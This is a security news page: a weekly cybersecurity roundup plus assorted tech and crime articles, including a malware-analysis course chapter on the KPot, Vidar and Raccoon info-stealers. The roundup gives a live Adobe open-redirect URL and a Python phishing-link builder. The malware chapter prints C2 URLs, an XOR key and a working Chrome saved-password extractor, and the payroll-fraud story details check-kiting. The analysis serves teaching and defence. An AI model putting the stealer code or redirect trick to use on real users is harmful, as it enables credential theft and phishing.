The Good, the Bad and the Ugly in Cybersecurity – Week 39


The Good

There was good news this week for everyone concerned about the widening cybersecurity skills shortage. Thanks to an expansion in the US Department of Labor’s industry-recognized apprenticeship programs (IRAPs) and an extra $183.8 million in funding, 23 higher ed institutions and groups, along with their private-sector partners, will receive support to provide 85,000 apprenticeships across several fields, including information technology. On the back of that, Florida International University has announced Cyber-CAP, a program that will train 800 cybersecurity apprentices over a period of four years.


This week also saw the release of a new public tool that should be of interest to threat researchers concerned with Russian APT groups. The sheer number and diversity of Russian-backed hacking groups with shared tooling have always presented an additional obstacle to attribution. Now, a new web-based interactive map can be used by anyone wishing to learn more about the connections between various groups, tools and campaigns. The map currently tracks 2,000 malware samples and some 22,000 connections between them.


The Bad

A sophisticated and targeted campaign using one-click mobile exploits was revealed this week by researchers in collaboration with the Tibetan Computer Emergency Readiness Team (TibCERT). The campaign involved sending malicious WhatsApp messages to members of Tibetan groups using both Android and iOS devices. Although the exploits involved publicly known vulnerabilities rather than any new zero-days, the researchers were able to link the threat actor to an earlier campaign that targeted the Uyghur ethnic minority. That points the finger at a likely Chinese-backed APT group. Activists in Hong Kong, take note.


The Ugly

Phishing remains the number one vector of compromise, so it’s unfortunate to see yet more open redirects become available for attackers to exploit. In a thread entitled Here’s a phishing URL to give you nightmares…, Reddit user wanderingbilby explained how he stumbled across an adobe.com domain being used to redirect the unwary to a compromised WordPress site hosted on Microsoft’s windows.net. The trick is easy to pull off: append whatever destination you like to the p1= parameter of the URL below and Adobe will kindly redirect to it for you.

https://t-info.mail.adobe.com/r/?id=hc43f43t4a,afd67070,affc7349&p1=

It’s hardly a new vector: as other Reddit commenters were quick to point out, spammers have been exploiting open redirects via LinkedIn, Google and many other domains for some time. What it does highlight is that simply training your users to examine the primary domain in a link is neither a reliable nor a sufficient method of protection.
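To see just how little work this takes, here’s a quick sketch in Python. The redirector URL is the one from the Reddit thread; the target below is a made-up placeholder, not a real phishing page.

# Why "check the primary domain" fails: the visible domain is adobe.com,
# but the p1= parameter decides where the victim actually ends up.
from urllib.parse import quote

REDIRECTOR = "https://t-info.mail.adobe.com/r/?id=hc43f43t4a,afd67070,affc7349&p1="
target = "https://example-phish.test/login"   # hypothetical attacker-controlled page

phishing_link = REDIRECTOR + quote(target, safe="")
print(phishing_link)   # looks like an adobe.com link, lands on the target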



Read more about Cyber Security

Google will soon open a cloud region in Poland

Google today announced its plans to open a new cloud region in Warsaw, Poland to better serve its customers in Central and Eastern Europe.

This move is part of Google’s overall investment in expanding the physical footprint of its data centers. Only a few days ago, after all, the company announced that, in the next two years, it would spend $3.3 billion on its data center presence in Europe alone.

Google Cloud currently operates 20 different regions with 61 availability zones. Warsaw, like most of Google’s regions, will feature three availability zones and launch with all the standard core Google Cloud services, including Compute Engine, App Engine, Google Kubernetes Engine, Cloud Bigtable, Cloud Spanner and BigQuery.

To launch the new region in Poland, Google is partnering with Domestic Cloud Provider (a.k.a. Chmury Krajowej, which itself is a joint venture of the Polish Development Fund and PKO Bank Polski). Domestic Cloud Provider (DCP) will become a Google Cloud reseller in the country and build managed services on top of Google’s infrastructure.

“Poland is in a period of rapid growth, is accelerating its digital transformation, and has become an international software engineering hub,” writes Google Cloud CEO Thomas Kurian. “The strategic partnership with DCP and the new Google Cloud region in Warsaw align with our commitment to boost Poland’s digital economy and will make it easier for Polish companies to build highly available, meaningful applications for their customers.”

MyPayrollHR CEO Arrested, Admits to $70M Fraud

Earlier this month, employees at more than 1,000 companies saw one or two paychecks’ worth of funds deducted from their bank accounts after the CEO of their cloud payroll provider absconded with $35 million in payroll and tax deposits from customers. On Monday, the CEO was arrested and allegedly confessed that the diversion was the last desperate gasp of a financial shell game that earned him $70 million over several years.

Michael T. Mann, the 49-year-old CEO of Clifton Park, NY-based MyPayrollHR, was arrested this week and charged with bank fraud. In court filings, FBI investigators said Mann admitted under questioning that in early September — on the eve of a big payroll day — he diverted to his own bank account some $35 million in funds sent by his clients to cover their employee payroll deposits and tax withholdings.

After that stunt, two different banks that work with Mann’s various companies froze those corporate accounts to keep the funds from being moved or withdrawn. That action set off a chain of events that led another financial institution that helps MyPayrollHR process payments to briefly pull almost $26 million out of checking accounts belonging to employees at more than 1,000 companies that use MyPayrollHR.

At the same time, MyPayrollHR sent a message to clients saying it was shutting down and that customers should find alternative methods for paying employees and for processing payroll going forward.

In the criminal complaint against Mann (PDF), a New York FBI agent said the CEO admitted that starting in 2010 or 2011 he began borrowing large sums of money from banks and financing companies under false pretenses.

“While stating that MyPayroll was legitimate, he admitted to creating other companies that had no purpose other than to be used in the fraud; fraudulently representing to banks and financing companies that his fake businesses had certain receivables that they did not have; and obtaining loans and lines of credit by borrowing against these non-existent receivables.”

“Mann estimated that he fraudulently obtained about $70 million that he has not paid back. He claimed that he committed the fraud in response to business and financial pressures, and that he used almost all of the fraudulently obtained funds to sustain certain businesses, and purchase and start new ones. He also admitted to kiting checks between Bank of America and Pioneer [Savings Bank], as part of the fraudulent scheme.”

Check-kiting is the illegal act of writing a check from a bank account without sufficient funds and depositing it into another bank account, explains MagnifyMoney.com. “Then, you withdraw the money from that second account before the original check has been cleared.”

Kiting also is known as taking advantage of the “float,” which is the amount of time between when an individual submits a check as payment and when the individual’s bank is instructed to move the funds from the account.

Magnify Money explains more:

“Say, for example, that you write yourself a check for $500 from checking account A, and deposit that check into checking account B — but the balance in checking account A is only $75. Then, you promptly withdraw the $500 from checking account B. This is check-kiting, a form of check fraud that uses non-existent funds in a checking account or other type of bank account. Some check-kiting schemes use multiple accounts at a single bank, and more complicated schemes involve multiple financial institutions.”

“In a more complex scenario, a person could open checking accounts at bank A and bank B, at first depositing $500 into bank A and nothing in bank B. Then, they could write a check for $10,000 with account A and deposit it into account B. Bank B immediately credits the account, and in the time it might take for bank B to clear the check (generally about three business days), the scammer writes a $10,000 check with bank B, which gets deposited into bank A to cover the first check. This could keep going, with someone writing checks between banks where there’s no actual funds, yet the bank believes the money is real and continues to credit the accounts.”

The government alleges Mann was kiting millions of dollars in checks between his accounts at Bank of America and Pioneer from Aug. 1, 2019 to Aug. 30, 2019.

For more than a decade, MyPayrollHR worked with California-based Cachet Financial Services to process payroll deposits for MyPayrollHR client employees. Every other week, MyPayrollHR’s customers would deposit their payroll funds into a holding account run by Cachet, which would then disburse the payments into MyPayrollHR client employee bank accounts.

But when Mann diverted $26 million in client payroll deposits from Cachet to his account at Pioneer Bank, Cachet’s emptied holding account was debited for the payroll payments. Cachet quickly reversed those deposits, causing one or two pay periods worth of salary to be deducted from bank accounts for employees of companies that used MyPayrollHR.

That action caused so much uproar from affected companies and their employees that Cachet ultimately decided to cancel all of those reversals and absorb that $26 million hit, which it is now trying to recover through the courts.

According to prosecutors in New York, Pioneer was Mann’s largest creditor.

“Mann stated that the payroll issue was precipitated by his decision to route MyPayroll’s clients’ payroll payments to an account at Pioneer instead of directly to Cachet,” wrote FBI Special Agent Matthew J. Wabby. “He did this in order to temporarily reduce the amount of money he owed to Pioneer. When Pioneer froze Mann’s accounts, it also (inadvertently) stopped movement of MyPayroll’s clients’ payroll payments to Cachet.”

Approximately $9 million of the $35 million diverted by Mann was supposed to go to accounts at the National Payment Corporation (NatPay) — the Florida-based firm which handles tax withholdings for MyPayrollHR clients. NatPay said its insurance should help cover the losses it incurred when MyPayrollHR’s banks froze the company’s accounts.

Court records indicate Mann hasn’t yet entered a plea, but that he was ordered to be released today under a $200,000 bond secured by a family home and two vehicles. His passport also was seized.

Info Stealers | How Malware Hacks Private User Data

The Zero2Hero malware course continues with Daniel Bunce exploring information stealers that target users’ browser data, passwords and other sensitive credentials.


One of the most common types of malware found nowadays is the info-stealer. As the name suggests, the sole purpose of info-stealers is to steal as much personal information as possible, from basic system information up to locally stored usernames and passwords. They are typically not very sophisticated and are usually sold on hacking-related sites such as HackForums for anywhere from as little as $10 to a couple of hundred dollars. Most info-stealers follow a very similar methodology when stealing user information, with only a few major differences such as encryption algorithms and the networking side of things. In this post, we will take a look at three different popular info-stealers, KPot, Vidar, and Raccoon Stealer, and examine the commonalities between the three in the data each attempts to steal.

KPot Info-Stealer

According to the NJCCIC, KPot Stealer is a stealer

“that focuses on exfiltrating account information and other data from web browsers, instant messengers, email, VPN, RDP, FTP, cryptocurrency, and gaming software.”

This was later altered to also target users of the Jaxx cryptocurrency wallet.

Upon startup, KPot begins to resolve the API calls it needs using API hashing; however, rather than using a common hashing algorithm such as CRC-32, it utilizes an algorithm known as MurmurHash for hashing and importing.
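To make the idea concrete, here is a minimal sketch of API hashing in Python, using the mmh3 MurmurHash3 bindings. KPot’s exact MurmurHash variant, seed and target hash values are not reproduced here; everything below is computed on the fly purely to illustrate the technique.

import mmh3   # pip install mmh3 (MurmurHash3 bindings)

SEED = 0   # assumed seed; real samples choose their own

def api_hash(name: str) -> int:
    # hash the export name and mask to an unsigned 32-bit value
    return mmh3.hash(name, SEED) & 0xFFFFFFFF

# The binary stores only the hash of the API it wants, never the readable name...
wanted = api_hash("CreateFileW")

# ...then walks a DLL's export table at runtime, hashing each name until one matches.
exports = ["CloseHandle", "CreateFileW", "ReadFile", "WriteFile"]
resolved = next(name for name in exports if api_hash(name) == wanted)
print(resolved)   # -> CreateFileW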


KPot also contains many encrypted strings, which are stored in the sample in arrays. A single function is used for decryption, with the first argument indicating which string should be decrypted. The algorithm used to decrypt these strings is a simple XOR loop, using a key stored in the relevant array. These arrays contain the XOR key, the size of the string, and a pointer to the encrypted string.
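As a rough illustration of that layout (with invented values rather than the ones in the sample), decryption amounts to nothing more than a rolling XOR over the stored bytes:

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # rolling XOR, repeating the key across the data
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"\x5a\x13"                    # per-entry XOR key (invented)
plain = b"gate.php"                  # invented plaintext for the demo
entry = (key, len(plain), xor_bytes(plain, key))   # (key, size, encrypted string)

k, size, encrypted = entry
print(xor_bytes(encrypted, k)[:size].decode())     # -> gate.php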


Another interesting feature of KPot is the checking of the default user language ID. The value of this is compared to languages from countries that are part of the Commonwealth of Independent States (CIS), and if a match is discovered, the process will exit. This is quite common in a lot of samples, as threat actors who are based there can avoid legal issues as long as they don’t infect anyone in those countries.
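A minimal, Windows-only sketch of such a locale check might look like the following. The handful of language IDs listed is illustrative; the full list KPot compares against is not reproduced here.

import ctypes
import sys

# LANGID values for a few CIS-region locales (illustrative, not exhaustive)
CIS_LANGIDS = {
    0x0419,   # Russian
    0x0422,   # Ukrainian
    0x0423,   # Belarusian
    0x043F,   # Kazakh
}

langid = ctypes.windll.kernel32.GetUserDefaultLangID()
if langid in CIS_LANGIDS:
    sys.exit(0)   # bail out quietly, mirroring the behavior described above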


Looking at the communications side of things, KPot communicates over HTTP to a hardcoded C2 panel. In this sample, the C2 server is:

http[:]//bendes[.]co[.]uk/lmpUNlwDfoybeulu/gate[.]php

Upon first contact, the sample simply tries to perform a GET request on the C2 server until it gets a response. The response is Base64 Encoded and XOR’d with a key that is stored in the binary in one of the encrypted arrays. In this sample, the key is:

4p81GSwBwRrAhCYK
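Decoding such a response is trivial once the key is recovered from the binary. The sketch below round-trips a made-up command string with the key from this sample, just to show the Base64-plus-XOR scheme; the real command format is not reproduced here.

import base64

KEY = b"4p81GSwBwRrAhCYK"   # key recovered from this sample

def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decode_response(body: str) -> bytes:
    # Base64-decode, then XOR with the embedded key
    return xor(base64.b64decode(body), KEY)

# round-trip demo with an invented command string
fake_response = base64.b64encode(xor(b"GRAB passwords|SYSINFO", KEY)).decode()
print(decode_response(fake_response))   # -> b'GRAB passwords|SYSINFO'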


Once the data has been decrypted, KPot parses it to find the commands it has been given, such as files to steal, passwords to retrieve, and system information to gather. The system information collected comprises system GUIDs, RAM information, screen size and CPU details, plus the data exfiltrated based on the commands. As this is not meant to be a full analysis of KPot, I will skip the majority of the communications phase; however, I highly suggest taking a look at it if you are interested in learning malware analysis but don’t want anything highly complicated.

As for the password stealing, it is almost identical to that of Vidar and Raccoon, and since the C2 server for this sample had gone down at the time of writing, it was very unlikely (without C2 replication) that the sample could get past the initial connection stage. Therefore, the main comparison of password stealing capabilities will be made between Vidar and Raccoon.

Vidar Stealer

The Vidar Stealer is another popular stealer that was utilized by the threat actors behind GandCrab to steal user information, profile a system, and finally drop and execute the GandCrab ransomware, increasing profitability with each infection. This stealer is actually a fork of the Arkei stealer, and according to another security researcher, Fumik0, there are very few differences in the operation of the two. Interestingly, of the three samples discussed here, only Vidar was packed, using a simple self-injection packer.

As soon as we open up Vidar in IDA, we can already see the checks for the locale. In this sample there are far fewer checks, potentially narrowing down the locations where the threat actors are based; however, this could be misleading.


As we saw in the previous info-stealer, Vidar also utilizes encrypted strings, although in this case they are easier to locate based on the sheer size of the function. The encrypted strings contain the file paths and names of each browser, wallet, and piece of software that Vidar can steal information from. This ranges from the basic browsers such as Opera, Chrome, and Firefox all the way up to TOR browser and a large number of uncommon browsers – there is a very high chance that for any browser you can think of, Vidar steals some form of information from it, whether it is cookies, usernames and passwords, or card details.


It also targets software such as Telegram and plenty of cryptowallets, making it no surprise it was the tool of choice for those behind the infamous GandCrab. This is probably one of the major differences between info-stealers: the amount of information that each is capable of stealing. Vidar covers all bases, whereas smaller tools such as Raccoon Stealer focus on the more popular software like Chrome and Opera.


Not only does Vidar steal a vast quantity of data from software, it also gathers as much system information as possible, and stores this in the file information.txt inside a created directory in ProgramData. The information it attempts to gather includes running processes and system hardware details, but it also attempts to gather the IP address, country, city, geo-coordinates and ISP of the victim. Vidar then steals as much information as possible, including Telegram passwords and browser information, storing the data in files called outlook.txt and passwords.txt. This is then zipped and sent to the C2 server.


Rather than cover password extraction of every single browser, I will cover how passwords and usernames are extracted from one of the most popular browsers: Chrome.

When Chrome (and most other browsers) asks if you want to save login information for later use, that information is encrypted and stored in an SQLite database file on the machine. When you revisit the site and try to log in again, Chrome opens up the database, locates the correct login, and decrypts it. The issue with this is that any malware running on the system is able to do the same. In order to encrypt and decrypt the data, Chrome utilizes two Windows API calls: CryptProtectData and CryptUnprotectData. All the malware has to do is utilize the CryptUnprotectData API call to decrypt the saved logins and extract them, either by dropping an SQLite3 DLL to the system or by using one already present.


Python Example of Chrome Password Stealer (here)
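The linked example isn’t reproduced here, but a minimal sketch of the same idea looks something like the following. It assumes the pre-Chrome-80 storage scheme that was current at the time of writing (passwords protected directly with DPAPI) and is for educational illustration only.

import os
import shutil
import sqlite3
import win32crypt   # pip install pywin32

# Chrome keeps the database locked while running, so work on a copy
login_db = os.path.expandvars(
    r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data")
tmp_copy = "LoginData.tmp"
shutil.copy2(login_db, tmp_copy)

conn = sqlite3.connect(tmp_copy)
for url, user, enc_pw in conn.execute(
        "SELECT origin_url, username_value, password_value FROM logins"):
    # CryptUnprotectData returns a (description, plaintext_bytes) tuple
    plaintext = win32crypt.CryptUnprotectData(enc_pw, None, None, None, 0)[1]
    print(url, user, plaintext.decode(errors="replace"))
conn.close()
os.remove(tmp_copy)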

Some browsers attempt to prevent malware from performing this extraction by using their own encryption algorithms. In the case of Firefox, for example, two Firefox DLLs need to be loaded and used in order to decrypt the data; however, this only slows the threat actors down briefly, as they simply import these libraries dynamically at runtime and decrypt the passwords, or download the required libraries, as in the case of the next stealer, Raccoon Stealer.

Raccoon Stealer

Raccoon Stealer is the newest stealer to be released out of the three. According to Malpedia, it collects 

“passwords, cookies and autofill from all popular browsers (including FireFox x64), CC data, system information, almost all existing desktop wallets of cryptocurrencies”. 

As you can probably imagine, it is very similar to the previous two info-stealers we covered, so let’s take a quick peek into the internals.

What sets Raccoon Stealer apart from the previous two stealers is the fact that it downloads a ZIP file and a DLL from the C2 server to perform its stealing routines. As mentioned before, in order to extract login info from Chrome and multiple other browsers, SQLITE3.DLL is required. Rather than bundling this inside the binary, Raccoon Stealer simply downloads it from the C2 server. The next file downloaded (the ZIP) contains 50+ libraries required for login/user data extraction from different browsers and software.


The communications protocol is also fairly simple, and only utilizes Base64 for encoding sent data. Examining one of the files tagged Raccoon Stealer on AnyRun, we can see that the first contact with the C2 simply passes a base64 encoded string. We can see the decoded version of this below.

bot_id=90059C37-1320-41A4-B58D-2B75A9850D2F_admin&config_id=270ed6774bfe19220ed8e893bc7a752ef50727e6&data=null

The response from the C2 is in JSON format and cleartext, and can be seen below:

{
    "url": "http://34.90.238.61/file_handler/file.php?hash=1f0af54680ea00537f3377b60eb459472d62373b&js=8b72c2da30a231cbd0744352e39e6d3a2c9d9cf9&callback=http://34.90.238.61/gate",
    "attachment_url": "http://34.90.238.61/gate/sqlite3.dll",
    "libraries": "http://34.90.238.61/gate/libs.zip",
    "ip": "185.192.69.140",
    "config": {
        "masks": null,
        "loader_urls": null
    },
    "is_screen_enabled": 0,
    "is_history_enabled": 0
}

Here we can see clearly that Raccoon Stealer gets the URLs of the SQLITE3.DLL and the required libraries ZIP file, as well as the configuration, through the response from the C2, increasing the chance that it will get detected by anti-virus due to how “noisy” it is on an infected system. Looking at the strings of the Raccoon Stealer payload is enough to determine its capabilities as a password stealer.
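A short sketch of that exchange, using the beacon string above and a trimmed copy of the JSON response, shows just how little the client has to do:

import base64
import json

# first contact: the beacon is nothing more than a Base64-encoded query string
beacon = ("bot_id=90059C37-1320-41A4-B58D-2B75A9850D2F_admin"
          "&config_id=270ed6774bfe19220ed8e893bc7a752ef50727e6&data=null")
wire_beacon = base64.b64encode(beacon.encode()).decode()

# trimmed copy of the cleartext JSON reply shown above
C2_REPLY = '''{
  "attachment_url": "http://34.90.238.61/gate/sqlite3.dll",
  "libraries": "http://34.90.238.61/gate/libs.zip",
  "is_screen_enabled": 0,
  "is_history_enabled": 0
}'''

config = json.loads(C2_REPLY)
sqlite_dll_url = config["attachment_url"]   # DLL needed for browser DB extraction
libs_zip_url = config["libraries"]          # 50+ helper libraries
take_screenshots = bool(config["is_screen_enabled"])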


Wrapping Up

So, while there are some similarities in how each of the samples performs its user-data stealing tasks, there is definitely a differing level of sophistication between them. While Raccoon Stealer and KPot attempt to steal credentials from the most common software in use, Vidar attempts to steal as much data as possible, including location data. This explains why the threat actors behind GandCrab thought it was the best tool for the job: it allowed them to profit from stolen credentials as well as profile the system before deploying GandCrab to suitable systems. In contrast, KPot has a modular interface, allowing the threat actors to choose what they want to steal, which is fairly strange considering there is no reason not to steal certain credentials on the machine. Finally, Raccoon Stealer is the least sophisticated of the three, seemingly just a basic information stealer with limited functionality; however, it still gets the job done.

The one main commonality between all three, however, is the strings, and this shared trait is the best way to identify an information stealer: if you can see references to browsers, API calls such as CryptUnprotectData, and libraries such as SQLITE3 in the strings, then there is a very high chance you are analyzing an info-stealer.
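That observation translates directly into a crude triage script. The indicator list below is illustrative rather than definitive, and a hit count is only a hint to dig deeper, not a verdict:

import sys

# strings commonly referenced by info-stealers (illustrative list)
INDICATORS = [b"CryptUnprotectData", b"sqlite3", b"Login Data",
              b"Chrome", b"Firefox", b"Cookies", b"wallet"]

def looks_like_infostealer(path: str, threshold: int = 4) -> bool:
    data = open(path, "rb").read()
    hits = [i for i in INDICATORS if i in data]
    return len(hits) >= threshold

if __name__ == "__main__":
    print(looks_like_infostealer(sys.argv[1]))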



Read more about Cyber Security

India’s Darwinbox raises $15M to bring its HR tech platform to more Asian markets

An Indian SaaS startup, which is increasingly courting clients from outside the country, just raised a significant amount of capital to expand its business.

Hyderabad-based Darwinbox, which operates a cloud-based human resource management platform, said on Thursday it has raised $15 million in a new financing round. The Series B round — which moves the firm’s total raise to $19.7 million — was led by Sequoia India and saw participation from existing investors Lightspeed India Partners, Endiya Partners and 3one4 Capital.

More than 200 firms — including giants such as adtech firm InMobi, fintech startup Paytm, drink conglomerate Bisleri, automobile maker Mahindra, Kotak group and delivery firms Swiggy and Milkbasket — use Darwinbox’s HR platform to serve half a million of their employees in 50 nations, Rohit Chennamaneni, co-founder of Darwinbox, told TechCrunch in an interview.

The startup, which competes with giants such as SAP and Oracle, said its platform enables a high level of configurability and ease of use, and understands the needs of modern employees. “The employees today who have grown accustomed to using consumer-focused services such as Uber and Amazon are left disappointed in their experience with their own firm’s HR offerings,” said Gowthami Kanumuru, VP Marketing at Darwinbox, in an interview.

Darwinbox’s HR platform offers a range of features, including the ability for firms to offer their employees insurance and early salary as loans. Its platform also features social networks for employees within a company to connect and talk, as well as an AI assistant that allows them to apply for a leave or set up meetings with quick voice commands from their phone.

“The AI system is not just looking for certain keywords. If an employee tells the system he or she is not feeling well today, it automatically applies a leave for them,” she said.

Darwinbox’s platform is built to handle onboarding new employees, keep tabs on their performance, monitor attrition rate and maintain an ongoing feedback loop. Or as Kanumuru puts it, the entire “hiring to retiring” cycle.

One of Darwinbox’s clients is L&T, which is tasked with setting up subways in many Indian cities. L&T is using Darwinbox’s geo-fencing feature to log the attendance of employees. “They are not using biometric punch machine that is typically used by other firms. Instead, they just require their 1,200 employees to check-in from the workplace using their phones,” said Kanumuru.


Additionally, Darwinbox is largely focusing on serving companies based in Asia as it believes Western companies’ solutions are not a great fit for people here, said Kanumuru. The startup began courting clients in Southeast Asian markets last year.

“Our growth is a huge validation for our vision,” she said. “Within six months of operations, we had the delivery giant Delhivery with over 23,000 employees use our platform.”

In a statement to TechCrunch, Dev Khare, a partner at Lightspeed Venture, said, “there is a new trend of SaaS companies targeting the India/SE Asia markets. This trend is gathering steam and is disproving the conventional wisdom that Asia-focused SaaS companies cannot get to be big companies. We firmly believe that Asia-focused SaaS companies can get to large impact value and become large and profitable. Darwinbox is one of these companies.”

Darwinbox’s Chennamaneni said the startup will use the fresh capital to expand its footprint in Indonesia, Malaysia, Thailand and other Southeast Asian markets. Darwinbox also will expand its product offerings to address more of employees’ needs. The startup is also looking to make its platform enable tasks such as booking flights and hotels.

Chennamaneni, an alum of Google and McKinsey, said Darwinbox aims to double the number of clients it has in the next six to nine months.

Battlefield vets StrongSalt (formerly OverNest) announces $3M seed round

StrongSalt, then known as OverNest, appeared at the TechCrunch Disrupt NYC Battlefield in 2016, and announced a product for searching encrypted code, which remains unusual to this day. Today, the company announced a $3 million seed round led by Valley Capital Partners.

StrongSalt founder and CEO Ed Yu says encryption remains a difficult proposition, and that when you look at the majority of breaches, encryption wasn’t used. He said that his company wants to simplify adding encryption to applications, and came up with a new service to let developers add encryption in the form of an API. “We decided to come up with what we call an API platform. It’s like infrastructure that allows you to integrate our solution into any existing or any new applications,” he said.

The company’s original idea was to create a product to search encrypted code, but Yu says the tech has much more utility as an API that’s applicable across applications, and that’s why they decided to package it as a service. It’s not unlike Twilio for communications or Stripe for payments, except in this case you can build in searchable encryption.

The searchable part is actually a pretty big deal because, as Yu points out, when you encrypt data it is no longer searchable. “If you encrypt all your data, you cannot search within it, and if you cannot search within it, you cannot find the data you’re looking for, and obviously you can’t really use the data. So we actually solved that problem,” he said.
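To be clear about what searchable encryption means in principle, here is a toy illustration of the general concept: a blind index of keyed keyword tokens stored next to the ciphertext. This is emphatically not StrongSalt’s design or API, just a sketch of why search over encrypted data is possible at all.

import hmac, hashlib, os
from cryptography.fernet import Fernet   # pip install cryptography

enc_key = Fernet.generate_key()   # encrypts the records
idx_key = os.urandom(32)          # keys the blind keyword index
f = Fernet(enc_key)

def token(word: str) -> str:
    # deterministic, keyed token: reveals nothing useful without idx_key
    return hmac.new(idx_key, word.lower().encode(), hashlib.sha256).hexdigest()

store, index = {}, {}

def put(doc_id: str, text: str):
    store[doc_id] = f.encrypt(text.encode())            # only ciphertext is stored
    for word in set(text.lower().split()):
        index.setdefault(token(word), set()).add(doc_id)

def search(word: str):
    return [f.decrypt(store[d]).decode() for d in index.get(token(word), ())]

put("doc1", "quarterly revenue report")
print(search("revenue"))   # -> ['quarterly revenue report']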

Developers can add searchable encryption as part of their applications. For customers already using a commercial product, the company’s API actually integrates with popular services, enabling customers to encrypt the data stored there, while keeping it searchable.

“We will offer a storage API on top of Box, AWS S3, Google Cloud, Azure — depending on what the customer has or wants. If the customer already has AWS S3 storage, for example, then when they use our API, and after encrypting the data, it will be stored in their AWS repository,” Yu explained.

For those companies that don’t have a storage service, the company is offering one. What’s more, they are using the blockchain to provide a mechanism for sharing, auditing and managing encrypted data. “We also use the blockchain for sharing data by recording the authorization by the sender, so the receiver can retrieve the information needed to reconstruct the keys in order to retrieve the data. This simplifies key management in the case of sharing and ensures auditability and revocability of the sharing by the sender,” Yu said.

If you’re wondering how the company has been surviving since 2016, while only getting its seed round today, it had a couple of small seed rounds prior to this, and a contract with the U.S. Department of Defense, which replaced the need for substantial earlier funding.

“The DOD was looking for a solution to have secure communication between computers, and they needed to have a way to securely store data, and so we were providing a solution for them,” he said. In fact, this work was what led them to build the commercial API platform they are offering today.

The company, which was founded in 2015, currently has 12 employees spread across the globe.

MediaRadar’s new product helps event organizers maximize sales

MediaRadar CEO Todd Krizelman describes his company as having “a very specific objective, which is to help media salespeople sell more advertising” by providing them with crucial data. And with today’s launch of MediaRadar Events, Krizelman hopes to do something similar for event organizers.

These customer groups might actually be one and the same, as plenty of companies (including TechCrunch) see both advertising and events as part of their business. In fact, Krizelman said customer demand “basically pushed us into this business.”

He also suggested that after years of seeing traditional ad dollars shifting into digital, “the money is now moving out of digital into events.”

If you’re organizing a trade show, you can use MediaRadar Events to learn about the overall size of the market, and then see who’s been purchasing sponsorships and exhibitor booths at similar events.

The product doesn’t just tell you who to reach out to, but how much these companies have paid for booths and sponsorships in the past, whether there are seasonal patterns in their conference spending and how that spending fits into their overall marketing budget — after all, Krizelman said, “In 2019, very few companies are siloed by media format as a buyer or a seller. Anyone doing that is putting their business at risk.”

He also described collecting the data needed to power MediaRadar Events as “much more complicated than we expected,” which is why it took the team two years to build the product. He said that data comes from three sources — some of it is posted publicly by event organizers, some is shared directly by the event organizers with MediaRadar and, in some cases, members of the MediaRadar team will attend the events themselves.

MediaRadar Events supports a wide range of events, although Krizelman acknowledged that it doesn’t have data for every industry. For example, he suggested that a convention for coin-operated laundromat owners might be “too niche” (though he hastened to add that he meant no offense to the laundromat business).

In a statement, James Ogle — chief financial officer at Access Intelligence (which owns the LeadsCon conference and publications like AdExchanger) — said:

Hosting events and the resulting revenue that comes from them is a big part of our business. However, the event space is getting more and more crowded and also more niche. Relevancy equals value, so we want to make sure our attendees are within the right target market for our exhibitors. MediaRadar provides critical transparency into the marketplace.

Interview With the Guy Who Tried to Frame Me for Heroin Possession

In April 2013, I received via U.S. mail more than a gram of pure heroin as part of a scheme to get me arrested for drug possession. But the plan failed and the Ukrainian mastermind behind it soon after was imprisoned for unrelated cybercrime offenses. That individual recently gave his first interview since finishing his jail time here in the states, and he’s shared some select (if often abrasive and coarse) details on how he got into cybercrime and why. Below are a few translated excerpts.

When I first encountered now-31-year-old Sergei “Fly,” “Flycracker,” “MUXACC” Vovnenko in 2013, he was the administrator of the fraud forum “thecc[dot]bz,” an exclusive and closely guarded Russian language board dedicated to financial fraud and identity theft.

Many of the heavy-hitters from other fraud forums had a presence on Fly’s forum, and collectively the group financed and ran a soup-to-nuts network for turning hacked credit card data into mounds of cash.

Vovnenko first came onto my radar after his alter ego Fly published a blog entry that led with an image of my bloodied, severed head and included my credit report, copies of identification documents, pictures of our front door, information about family members, and so on. Fly had invited all of his cybercriminal friends to ruin my financial identity and that of my family.

Somewhat curious about what might have precipitated this outburst, I was secretly given access to Fly’s cybercrime forum and learned he’d freshly hatched a plot to have heroin sent to my home. The plan was to have one of his forum lackeys spoof a call from one of my neighbors to the police when the drugs arrived, complaining that drugs were being delivered to our house and being sold out of our home by Yours Truly.

Thankfully, someone on Fly’s forum also posted a link to the tracking number for the drug shipment. Before the smack arrived, I had a police officer come out and take a report. After the heroin showed up, I gave the drugs to the local police and wrote about the experience in Mail From the Velvet Cybercrime Underground.

Angry that I’d foiled the plan to have me arrested for being a smack dealer, Fly or someone on his forum had a local florist send a gaudy floral arrangement in the shape of a giant cross to my home, complete with a menacing message that addressed my wife and was signed, “Velvet Crabs.”

The floral arrangement that Fly or one of his forum lackeys had delivered to my home in Virginia.

Vovnenko was arrested in Italy in the summer of 2014 on identity theft and botnet charges, and spent some 15 months in arguably Italy’s worst prison contesting his extradition to the United States. Those efforts failed, and he soon pleaded guilty to aggravated identity theft and wire fraud, and spent several years bouncing around America’s prison system.

Although Vovnenko sent me a total of three letters from prison in Naples (a hand-written apology letter and two friendly postcards), he never responded to my requests to meet him following his trial and conviction on cybercrime charges in the United States. I suppose that is fair: To my everlasting dismay, I never responded to his Italian dispatches (the first I asked to be professionally analyzed and translated before I would touch it).

Season’s greetings from my pen pal, Flycracker.

After serving his 41-month sentence in the U.S., Vovnenko was deported, although it’s unclear where he currently resides (the interview excerpted here suggests he’s back in Italy, but Fly doesn’t exactly confirm that).

In an interview published on the Russian-language security blog Krober[.]biz, Vovnenko said he began stealing early in life, and by 13 was already getting picked up for petty robberies and thefts.

A translated English version of the interview was produced and shared with KrebsOnSecurity by analysts at New York City-based cyber intelligence firm Flashpoint.

Sometime in the mid-aughts, Vovnenko settled with his mother in Naples, Italy, but he had trouble keeping a job for more than a few days. Until a chance encounter led to a front job at a den of thieves.

“When I came to my Mom in Naples, I could not find a permanent job. Having settled down somewhere at a new job, I would either get kicked out or leave in the first two days. I somehow didn’t succeed with employment until I was invited to work in a wine shop in the historical center of Naples, where I kinda had to wipe the dust from the bottles. But in fact, the wine shop turned out to be a real den and a sales outlet of hashish and crack. So my job was to be on the lookout and whenever the cops showed up, take a bag of goods and leave under the guise of a tourist.”

